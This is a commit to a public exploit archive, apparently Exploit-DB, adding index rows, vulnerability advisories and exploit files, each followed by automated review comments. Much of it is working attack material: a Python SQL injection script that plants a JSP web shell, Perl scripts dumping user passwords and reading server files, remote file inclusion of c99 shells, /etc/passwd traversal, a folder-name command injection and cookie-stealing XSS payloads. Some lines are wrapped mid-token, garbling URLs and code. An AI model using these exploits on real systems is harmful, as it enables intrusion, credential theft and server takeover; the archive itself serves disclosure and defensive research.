Updated 03_07_2014

This commit is contained in:
Offensive Security 2014-03-07 04:28:39 +00:00
parent 58e6a9f5be
commit f21446479d
23 changed files with 2061 additions and 0 deletions


@ -28665,6 +28665,7 @@ id,file,description,date,author,platform,type,port
31871,platforms/asp/webapps/31871.txt,"Te Ecard - 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0
31872,platforms/multiple/dos/31872.py,"NASA Ames Research Center BigView 1.8 - (.PNM File) Stack-Based Buffer Overflow Vulnerability",2008-06-04,"Alfredo Ortega",multiple,dos,0
31873,platforms/windows/remote/31873.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'ExtractCab' ActiveX Control Buffer Overflow Vulnerability",2008-06-03,"Dennis Rand",windows,remote,0
31874,platforms/jsp/webapps/31874.py,"Ganib Project Management 2.3 - SQL Injection",2014-02-24,drone,jsp,webapps,80
31875,platforms/linux/remote/31875.py,"Python socket.recvfrom_into() - Remote Buffer Overflow",2014-02-24,Sha0,linux,remote,0
31876,platforms/windows/dos/31876.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'StartApp' ActiveX Control Insecure Method Vulnerability",2008-06-03,"Dennis Rand",windows,dos,0
31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow Vulnerability",2008-06-04,"Dennis Rand",windows,dos,0
@ -28774,6 +28775,7 @@ id,file,description,date,author,platform,type,port
31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80
31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php, SortBy param) - SQL Injection Vulnerability",2014-02-28,HauntIT,php,webapps,80
31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
31991,platforms/windows/local/31991.rb,"VCDGear 3.50 (.cue) - Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0
31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0
@ -28850,3 +28852,23 @@ id,file,description,date,author,platform,type,port
32069,platforms/php/webapps/32069.txt,"Claroline 1.8.9 wiki/wiki.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0
32070,platforms/php/webapps/32070.txt,"Claroline 1.8.9 work/work.php URL XSS",2008-07-15,"Digital Security Research Group",php,webapps,0
32071,platforms/php/webapps/32071.txt,"Claroline 1.8.9 claroline/redirector.php url Variable Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps,0
32074,platforms/windows/local/32074.rb,"ALLPlayer M3U Buffer Overflow",2014-03-05,metasploit,windows,local,0
32075,platforms/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80
32076,platforms/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent XSS Vulnerability",2014-03-05,"High-Tech Bridge SA",php,webapps,80
32077,platforms/php/webapps/32077.txt,"IBS 0.15 'username' Parameter Cross Site Scripting Vulnerability",2008-07-17,Cyb3r-1sT,php,webapps,0
32078,platforms/php/webapps/32078.php,"Community CMS 0.1 'include.php' Remote File Include Vulnerability",2008-07-17,N3TR00T3R,php,webapps,0
32079,platforms/php/webapps/32079.txt,"CreaCMS edition_article/edition_article.php cfg[document_uri] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0
32080,platforms/php/webapps/32080.txt,"CreaCMS fonctions/get_liste_langue.php cfg[base_uri_admin] Parameter Remote File Inclusion",2008-07-18,Ciph3r,php,webapps,0
32081,platforms/php/webapps/32081.txt,"Lemon CMS 1.10 'browser.php' Local File Include Vulnerability",2008-07-18,Ciph3r,php,webapps,0
32082,platforms/php/webapps/32082.txt,"Def_Blog 1.0.3 comaddok.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0
32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 comlook.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0
32084,platforms/multiple/remote/32084.txt,"SmbClientParser 2.7 Perl Module Remote Command Execution Vulnerability",2008-07-18,"Jesus Olmos Gonzalez",multiple,remote,0
32085,platforms/php/webapps/32085.txt,"phpFreeChat 1.1 'demo21_with_hardocded_urls.php' Cross Site Scripting Vulnerability",2008-07-18,ahmadbady,php,webapps,0
32086,platforms/multiple/dos/32086.c,"SWAT 4 Multiple Denial Of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0
32087,platforms/php/webapps/32087.txt,"EasyBookMarker 4.0 'ajaxp_backend.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0
32088,platforms/php/webapps/32088.pl,"EasyDynamicPages 3.0 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
32089,platforms/php/webapps/32089.pl,"EasyPublish 3.0 'read' Parameter Multiple SQL Injection and Cross-Site Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
32090,platforms/php/webapps/32090.txt,"Maran PHP Blog 'comments.php' Cross-Site Scripting Vulnerability",2008-07-21,Dr.Crash,php,webapps,0
32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0
32092,platforms/php/webapps/32092.txt,"Flip 3.0 'config.php' Remote File Include Vulnerability",2008-07-21,Cru3l.b0y,php,webapps,0
32093,platforms/php/webapps/32093.txt,"phpKF 'forum_duzen.php' SQL Injection Vulnerability",2008-07-21,U238,php,webapps,0
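Review bot: The 31874 entry in the first hunk records port 80, but the script it points to (platforms/jsp/webapps/31874.py, added in this same commit) builds its request URL with a hardcoded `:8080`, so one of the two should be reconciled before the row is merged. In the third hunk, the 32085 description spells the script name `demo21_with_hardocded_urls.php`, while the phpFreeChat PoC text added in this commit uses `demo21_with_hardcoded_urls.php`; the description looks like the typo.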


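--- a/platforms/jsp/webapps/31874.py
+++ b/platforms/jsp/webapps/31874.py
@@ -0,0 +1,71 @@
+# Exploit title: Ganib 2.x SQLi
+# Date: 02/02/2014
+# Exploit author: drone (@dronesec)
+# More information: http://forelsec.blogspot.com/2014/02/ganib-project-management-23-multiple.html
+# Vendor homepage: http://www.ganib.com/
+# Software link: http://downloads.sourceforge.net/project/ganib/Ganib-2.0/Ganib-2.0_with_jre.zip
+# Version: <= 2.3
+# Fixed in: 2.4
+# Tested on: Ubuntu 12.04 (apparmor disabled) / WinXP SP3
+from argparse import ArgumentParser
+import sys
+import string
+import random
+import requests
+""" Ganib 2.0 preauth SQLi PoC
+@dronesec
+"""
+def loadJSP(options):
+data = ''
+try:
+with open(options.jsp) as f:
+for line in f.readlines():
+data += line.replace("\"", "\\\"").replace('\n', '')
+except Exception, e:
+print e
+sys.exit(1)
+return data
+def run(options):
+print '[!] Dropping %s on %s...' % (options.jsp, options.ip)
+url = "http://{0}:8080/LoginProcessing.jsp".format(options.ip)
+shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))
+exploit = '1 UNION SELECT "{0}","1","2","3" INTO OUTFILE "{1}"'
+exploit = exploit.format(loadJSP(options), options.path + '/%s.jsp' % shell)
+data = { "theAction" : "submit",
+"J_USERNAME" : "test",
+"J_PASSWORD" : "test",
+"language" : "en",
+"remember_checkbox" : "on",
+"userDomain" : exploit
+}
+res = requests.post(url, data=data)
+if res.status_code is 200:
+print '[!] Dropped at /{0}.jsp'.format(shell)
+else:
+print '[!] Failed to drop JSP (HTTP {0})'.format(res.status_code)
+def parse():
+parser = ArgumentParser()
+parser.add_argument("-i", help='Server ip address', action='store', dest='ip',
+required=True)
+parser.add_argument("-p", help='Writable web path (/var/www/ganib)', dest='path',
+action='store', default='/var/www/ganib')
+parser.add_argument("-j", help="JSP to deploy", dest='jsp', action='store')
+options = parser.parse_args()
+options.path = options.path if options.path[-1] != '/' else options.path[:-1]
+return options
+if __name__ == "__main__":
+run(parse())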
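Review bot: `if res.status_code is 200:` in run() tests object identity rather than equality; it only works because CPython caches small integers, so it should read `if res.status_code == 200:`. The file is Python 2 only (`except Exception, e`, bare `print` statements) but the header does not say so; a line such as `# Requires: Python 2.x, requests` next to "Tested on" would spare readers a failed run. The `-j` argument is not marked `required`, yet loadJSP() passes `options.jsp` straight to open(), so omitting it fails with a TypeError instead of a usage message.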

platforms/multiple/dos/32086.c Executable file



@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/30290/info
The SmbClientParser Perl module is prone to a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data.
Successfully exploiting this issue will allow an attacker to execute arbitrary commands with the privileges of the user running applications that use the module.
Filesys::SmbClientParser 2.7 is vulnerable; other versions may also be affected.
Name a folder the following:
' x && xterm &#
A shared folder containing this named folder will execute the following command:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc"

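--- a/platforms/php/webapps/31989.txt
+++ b/platforms/php/webapps/31989.txt
@@ -0,0 +1,26 @@
+# ==============================================================
+# Title ...| SQL Injection in webERP
+# Version .| 4.11.3
+# Date ....| 28.02.2014
+# Found ...| HauntIT Blog
+# Home ....| http://www.weberp.org
+# ==============================================================
+# ==============================================================
+# SQL Injection
+---<request>---
+POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1
+Host: 10.149.14.62
+(...)
+Content-Length: 391
+FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry
+---<request>---
+# ==============================================================
+# More @ http://HauntIT.blogspot.com
+# Thanks! ;)
+# o/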
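Review bot: The request body line holds two form bodies run together — the first `FormID=…&SortBy=` is followed immediately by a second `FormID=…` copy, and the trailing `&SummaryType=orderno&submit=Run Inquiry` pair is repeated once more at the end — so `Content-Length: 391` cannot describe what is shown, and a reader cannot tell which body reproduced the finding. The record should keep the single body that was actually sent, and the `(...)` placeholder should name the headers it stands for.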

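--- a/platforms/php/webapps/32075.txt
+++ b/platforms/php/webapps/32075.txt
@@ -0,0 +1,71 @@
+Advisory ID: HTB23202
+Product: OpenDocMan
+Vendor: Free Document Management Software
+Vulnerable Version(s): 1.2.7 and probably prior
+Tested Version: 1.2.7
+Advisory Publication: February 12, 2014 [without technical details]
+Vendor Notification: February 12, 2014
+Vendor Patch: February 24, 2014
+Public Disclosure: March 5, 2014
+Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284]
+CVE References: CVE-2014-1945, CVE-2014-1946
+Risk Level: High
+CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+------------------------------------------------------------------------
+-----------------------
+Advisory Details:
+High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.
+1) SQL Injection in OpenDocMan: CVE-2014-1945
+The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.
+The exploitation example below displays version of the MySQL server:
+http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
+ersion%28%29,3,4,5,6,7,8,9
+2) Improper Access Control in OpenDocMan: CVE-2014-1946
+The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating userâ??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application.
+The exploitation example below assigns administrative privileges for the current account:
+<form action="http://[host]/signup.php" method="post" name="main">
+<input type="hidden" name="updateuser" value="1">
+<input type="hidden" name="admin" value="1">
+<input type="hidden" name="id" value="[USER_ID]">
+<input type="submit" name="login" value="Run">
+</form>
+------------------------------------------------------------------------
+-----------------------
+Solution:
+Update to OpenDocMan v1.2.7.2
+More Information:
+http://www.opendocman.com/opendocman-v1-2-7-1-release/
+http://www.opendocman.com/opendocman-v1-2-7-2-released/
+------------------------------------------------------------------------
+-----------------------
+References:
+[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan.
+[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
+------------------------------------------------------------------------
+-----------------------
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.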
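Review bot: `userâ??s` in the CVE-2014-1946 paragraph is a mis-encoded apostrophe and should read `user's`; the same mojibake appears in the 32076.txt section of this commit, while the `CVE®`/`ImmuniWeb®` marks survived, so the file was likely transcoded once already. The CVE-2014-1945 example URL is also broken across two lines mid-token (`…1,v` / `ersion%28%29…`), so the stored record no longer matches the advisory's single-line example; rejoining it would make the PoC line self-consistent with the "displays version of the MySQL server" sentence above it.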

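--- a/platforms/php/webapps/32076.txt
+++ b/platforms/php/webapps/32076.txt
@@ -0,0 +1,64 @@
+Advisory ID: HTB23203
+Product: Ilch CMS
+Vendor: http://ilch.de
+Vulnerable Version(s): 2.0 and probably prior
+Tested Version: 2.0
+Advisory Publication: February 12, 2014 [without technical details]
+Vendor Notification: February 12, 2014
+Public Disclosure: March 5, 2014
+Vulnerability Type: Cross-Site Scripting [CWE-79]
+CVE Reference: CVE-2014-1944
+Risk Level: Medium
+CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+------------------------------------------------------------------------
+-----------------------
+Advisory Details:
+High-Tech Bridge Security Research Lab discovered vulnerability in Ilch CMS, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users and administrators of vulnerable application.
+1) Cross-Site Scripting (XSS) in Ilch CMS: CVE-2014-1944
+The vulnerability exists due to insufficient sanitisation of user-supplied data in "text" HTTP POST parameter passed to "/index.php/guestbook/index/newentry" URL. A remote unauthenticated user can send a specially crafted HTTP POST request, which allows to permanently inject and execute arbitrary HTML and script code in userâ??s browser in context of the vulnerable website when the victim visits the "http://[host]/index.php/guestbook/index/index" URL.
+The exploitation example below uses the JavaScript "alert()" function to display "immuniweb" word:
+POST /index.php/guestbook/index/newentry HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 151
+ilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40emai
+l.com&homepage=http%3A%2F%2Fsite.com&text=<script>alert('immuniwweb');</
+script>&saveEntry=Submit
+------------------------------------------------------------------------
+-----------------------
+Solution:
+Fixed by vendor on February 18, 2014 directly in the source code without version modification/new release. Update to the version 2.0 released after February 18, 2014.
+More Information:
+https://github.com/IlchCMS/Ilch-2.0/commit/381e15f39d07d3cdf6aaaa25c0f23
+21f817935f7
+https://github.com/IlchCMS/Ilch-2.0/commit/02bb4953c0e21cb8f20e5e91db5e1
+5a77fe1a5ce
+------------------------------------------------------------------------
+-----------------------
+References:
+[1] High-Tech Bridge Advisory HTB23203 - https://www.htbridge.com/advisory/HTB23203 - Cross-Site Scripting (XSS) in Ilch CMS.
+[2] Ilch CMS - http://ilch.de - Ilch is an easy to use content management system for clans, communities and homepages.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
+------------------------------------------------------------------------
+-----------------------
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.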
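Review bot: The description says the alert displays "immuniweb", but the request body spells it `immuniwweb`; one of the two should be corrected so the example and its explanation agree. The two vendor fix-commit URLs in the Solution section are split across line breaks (`…c0f23` / `21f817935f7` and `…db5e1` / `5a77fe1a5ce`), which leaves them unusable as links until rejoined; since these commits are the only pointer to the patch for a fix "without version modification", they are worth restoring to one line each. The example request is wrapped the same way (`emai` / `l.com`), so its `Content-Length: 151` no longer matches the text as stored.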


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30270/info
IBS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
IBS 0.15 is vulnerable; other versions may also be affected. The IBSng branch of the application is not vulnerable.
http://www.example.com/ibs/admin/index.php?username=<script>alert(document.cookie)</script>&password=a&B1=Submit

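--- a/platforms/php/webapps/32078.php
+++ b/platforms/php/webapps/32078.php
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/30275/info
+Community CMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
+Community CMS 0.1 is vulnerable; other versions may also be affected.
+<?php
+/************************************************** ********************
+*[+] << IN THE NAME OF GOD >>
+*[+]
+*[+]
+*[+] [ Persian Boys Hacking Team ] -:- 2008 -:- IRAN
+*[+] -
+*[+] - discovered by N3TR00T3R [at] Y! [dot] com
+*[+] - communitycms-0.1 Remote File Includion
+*[+] - download :http://sourceforge.net/project/showf...roup_id=223968
+*[+] - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph
+3r,shayan_cmd
+*[+] r00t.master,Dr.root,Pouya_server,Spyn3t,LordKouros h,123qwe,mr.n4ser
+*[+] Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...
+*[+]
+************************************************** ********************/
+#if register_globals = On;
+$shell="http://localhost/syn99.php?"; // your shell
+$target="http://localhost/communitycms/include.php"; //vul page --->
+include.php
+echo"<html>
+<body>
+<form action=$target method=POST>
+SECURITY :<input type=text name=security>
+SHELL :<input type=text name=root>
+<input type=hidden name=security value=1>
+<input type=hidden name=root value=$shell>
+<input type=submit value=ok>
+</form>
+</body>
+</html>";
+?>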
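Review bot: The trailing comment on the `$target=` line has been wrapped, leaving `include.php` on a line of its own outside the `//` comment, where PHP will not parse it; the stored file should read `$target="http://localhost/communitycms/include.php"; //vul page ---> include.php` on one line. The banner comment is wrapped the same way (`Ciph` / `3r,shayan_cmd`), which is harmless inside `/* */` but garbles the credits. `#if register_globals = On;` is a comment rather than a check, and reads as a precondition; stating it as `# requires register_globals = On` would make that clearer. The form also declares `security` and `root` twice (a text input and a hidden input each), which the note does not explain.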


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30284/info
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
CreaCMS 1 is vulnerable; other versions may also be affected.
http://www.example.com/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://127.0.0.1/c99.php?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30284/info
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
CreaCMS 1 is vulnerable; other versions may also be affected.
http://www.example.com/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://127.0.0.1/c99.php?


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30285/info
Lemon CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
Lemon CMS 1.10 is vulnerable; other versions may also be affected.
http://www.example.com/lemon_includes/FCKeditor/editor/filemanager/browser/browser.php?dir=../../../../../../../../../../etc/passwd


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30289/info
Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Def_Blog 1.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/[def_blog_path]/comaddok.php?article=-1+union+select+1,concat(pseudo,0x3a3a,mdp)+from+def_user--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30289/info
Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Def_Blog 1.0.3 is vulnerable; other versions may also be affected.
http://www.example.com/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30292/info
phpFreeChat is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
phpFreeChat 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/path/demo/demo21_with_hardcoded_urls.php/>'><ScRiPt>alert(document.cookie)</ScRiPt>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/30304/info
EasyBookMarker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
EasyBookMarker 4.0tr is vulnerable; other versions may also be affected.
<html> <head></head> <body onLoad=javascript:document.form.submit()> <form action="http://www.example.com/zomplog/ajaxp_backend.php" method="POST" name="form"> <input type="hidden" name="rs" value="&#x22;&#x20; <script>alert(document.cookie)</script>"> </form> </body> </html>

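--- a/platforms/php/webapps/32088.pl
+++ b/platforms/php/webapps/32088.pl
@@ -0,0 +1,210 @@
+source: http://www.securityfocus.com/bid/30305/info
+EasyDynamicPages is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data.
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+EasyDynamicPages 3.0tr is vulnerable; other versions may also be affected.
+#!/usr/bin/perl
+#----------------------------------------------------------------
+#
+#Script : Easydynamicpages 30tr
+#
+#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File
+Disclosure Exploit )
+#
+#Variable Method : GET
+#
+#Alert : High
+#
+#----------------------------------------------------------------
+#
+#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
+#
+#My Offical Website : HTTP://FEREIDANI.IR
+#
+#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
+#
+#----------------------------------------------------------------
+#
+#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
+#
+#----------------------------------------------------------------
+#
+#Script Download :
+http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip
+#
+#----------------------------------------------------------------
+#
+#Xss 1 :
+http://Example/staticpages/easycalendar/index.php?PageSection=1&month=4&year=<script>alert(document.cookie);</script>
+#
+#----------------------------------------------------------------
+#
+#SQL Injection :
+#
+#SQL 1 :
+http://Example/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*
+#
+#
+#----------------------------------------------------------------
+#
+# Tnx : God
+#
+# HTTP://IRCRASH.COM
+#
+#----------------------------------------------------------------
+use LWP;
+use HTTP::Request;
+use Getopt::Long;
+sub header
+{
+print "
+****************************************************
+* Easydynamicpages 30tr Exploit *
+****************************************************
+*Discovered by : Khashayar Fereidani *
+*Exploited by : Khashayar Fereidani *
+*My Official Website : http://fereidani.ir *
+****************************************************";
+}
+sub usage
+{
+print "
+* Usage : perl $0 http://Example/
+****************************************************
+";
+}
+$url = ($ARGV[0]);
+if(!$url)
+{
+header();
+usage();
+exit;
+}
+if($url !~ /\//){$url = $url."/";}
+if($url !~ /http:\/\//){$url = "http://".$url;}
+sub xpl1()
+{
+$vul =
+"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*";
+$requestpage = $url.$vul;
+my $req = HTTP::Request->new("POST",$requestpage);
+$ua = LWP::UserAgent->new;
+$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
+#$req->referer($url);
+$req->referer("IRCRASH.COM");
+$req->content_type('application/x-www-form-urlencoded');
+$req->header("content-length" => $contlen);
+$req->content($poststring);
+$response = $ua->request($req);
+$content = $response->content;
+$header = $response->headers_as_string();
+@name = split(/Login:/,$content);
+$name = @name[1];
+@name = split(/<enduser>/,$name);
+$name = @name[0];
+@password = split(/Password:/,$content);
+$password = @password[1];
+@password = split(/<endpass>/,$password);
+$password = @password[0];
+if(!$name && !$password)
+{
+print "\n\n";
+print "!Exploit failed ! :(\n\n";
+exit;
+}
+print "\n Username: ".$name."\n\n";
+print " Password: " .$password."\n\n";
+}
+#XPL2
+sub xpl2()
+{
+print "\n Example For File Address : /home/user/public_html/config.php\n
+Or /etc/passwd";
+print "\n Enter File Address :";
+$fil3 = <stdin>;
+$vul =
+"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*";
+$requestpage = $url.$vul;
+my $req = HTTP::Request->new("POST",$requestpage);
+$ua = LWP::UserAgent->new;
+$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
+#$req->referer($url);
+$req->referer("IRCRASH.COM");
+$req->content_type('application/x-www-form-urlencoded');
+$req->header("content-length" => $contlen);
+$req->content($poststring);
+$response = $ua->request($req);
+$content = $response->content;
+$header = $response->headers_as_string();
+@name = split(/Login:/,$content);
+$name = @name[1];
+@name = split(/<enduser>/,$name);
+$name = @name[0];
+if(!$name && !$password)
+{
+print "\n\n";
+print "!Exploit failed ! :(\n\n";
+exit;
+}
+open (FILE, ">".source.".txt");
+print FILE $name;
+close (FILE);
+print " File Save In source.txt\n";
+print "";
+}
+#XPL2 END
+#Starting;
+print "
+****************************************************
+* Easydynamicpages 30tr Exploit *
+****************************************************
+*Discovered by : Khashayar Fereidani *
+*Exploited by : Khashayar Fereidani *
+*My Official Website : http://fereidani.ir *
+****************************************************
+* Mod Options : *
+* Mod 1 : Find mysql username and root password *
+* Mod 2 : Save PHP config source in your system *
+****************************************************";
+print "\n \n Enter Mod : ";
+$mod=<stdin>;
+if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; }
+else { print "\n Unknown Mod ! \n Exploit Failed !"; };
+if ($mod=="1") { xpl1(); };
+if ($mod=="2") { xpl2(); };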
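Review bot: `$contlen` and `$poststring` are read in xpl1 (`$req->header("content-length" => $contlen)`, `$req->content($poststring)`) and again in xpl2, but are never assigned anywhere in the file, so both requests go out with an undefined Content-Length header and an empty body. `@name[1]` and `@password[1]` are one-element array slices where the scalar element `$name[1]` is meant, `$fil3 = <stdin>` is never chomped, and `open (FILE, ">".source.".txt")` relies on a bareword for the filename. Adding `use strict; use warnings;` after the `use Getopt::Long;` line (which is itself imported but never used) would have flagged every one of these before the file was committed. In the "Unknown Mod" branch the script prints a failure message but does not exit, so it falls through to the two `if ($mod==…)` tests anyway.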

